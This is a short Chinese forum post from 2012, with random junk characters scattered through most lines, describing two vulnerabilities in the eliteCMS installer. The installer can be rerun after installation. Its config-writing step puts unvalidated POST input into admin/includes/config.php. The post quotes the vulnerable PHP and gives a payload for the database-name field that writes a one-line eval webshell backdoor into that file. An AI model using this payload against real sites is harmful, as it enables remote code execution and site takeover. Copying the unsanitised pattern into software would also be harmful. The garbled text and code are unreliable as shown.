eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
1 M3 b0 y) D7 z3 u L1 ]" V/ ~
! i( L' V! ] S' {! R) ?另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php1 A! O" v/ o7 X1 N: c; i# z
我们来看代码:. Z/ J* b4 m Q2 D5 u1 J( L' V/ K
/ q E* D: I, i1 X6 J* ~! `
.... G* ?+ L- F+ p9 k. U
elseif ($_GET['step'] == "4") {
4 w7 F3 W, Y+ r9 n $file = "../admin/includes/config.php";. l' Y1 `& h1 P/ ?% x; E# N$ O
$write = "<?php\n";: y6 `: B/ F5 h1 ^
$write .= "/**\n";
' v# [5 w9 h/ K- m; h $write .= "*\n";3 J; s9 w& x) d0 i
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";. O+ P! P% e; d3 W6 [
...略...
7 r. w% P @8 M0 I ?' A: L $write .= "*\n";6 z U6 r: G) V6 d) @& L b
$write .= "*/\n";' r% @% H( h) p- t
$write .= "\n";
4 w1 c4 u8 O9 I# ?! P% d: Z" `6 X) o $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
, e7 ~- P$ D. U& q% G+ n v $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
& }& q8 t2 _. Y- m: a# E7 p $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";9 \! `' w8 ~$ l* D% i, I$ U9 d! T
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
$ ?) F1 B0 B% S( w* t0 D U $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";4 }! k8 W0 N9 k9 z& P0 I
$write .= "if (!\$connection) {\n";! x4 S) `% p5 e# r
$write .= " die(\"Database connection failed\" .mysql_error());\n";
" [6 S/ Y' W6 s- U! M, n: c$ p $write .= " \n";
6 A5 w* E# R2 w5 z P) h$ k $write .= "} \n";7 u9 @" z1 |3 n$ @6 ]/ Q# c8 p
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
3 i2 Z6 n% l g l/ o# _ $write .= "if (!\$db_select) {\n";
/ j7 D, v3 A- x: E $write .= " die(\"Database select failed\" .mysql_error());\n";2 [2 `/ f, }+ }7 X# e
$write .= " \n";% K. e2 b' G$ g; A* p. D' d/ [
$write .= "} \n";( p, ^2 A3 G6 \2 S
$write .= "?>\n";
) [2 S& {# O1 ^ J+ Q8 G$ j2 f 4 s7 m7 {# c9 y4 b7 ^* s
$writer = fopen($file, 'w');
9 G% A+ P/ s; d0 z4 U$ Q$ V0 w0 k8 L* O...! s" |# ~, Y8 w7 `
# ?# E `9 Z- _4 @
在看代码:
/ t$ {+ K1 @# p A $ N/ ]( i- M. W9 \
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];6 A4 G A5 ?; g- s5 Z" u
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
k* _' p' V1 b& R$_SESSION['DB_USER'] = $_POST['DB_USER'];! @" s9 e0 u8 W6 Z8 \
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];3 N) a8 z o% d. m
% T% g: Y) h) v. [% L取值未作任何验证
, y$ [+ j/ F( ~7 B如果将数据库名POST数据:
* p8 w. N! L' ? 9 N0 ], V" U" A# P; i6 {- }* f+ c
"?><?php eval($_POST[c]);?><?php! N* ? ~; ?. {) c* K9 W" v1 s
9 D/ c8 o0 n& }6 d" z. M
将导致一句话后门写入/admin/includes/config.php
* P/ R1 U2 z- Y/ L; _2 \* f3 m% g" e |
发表于 2012-11-18 13:59:27
收藏
支持
反对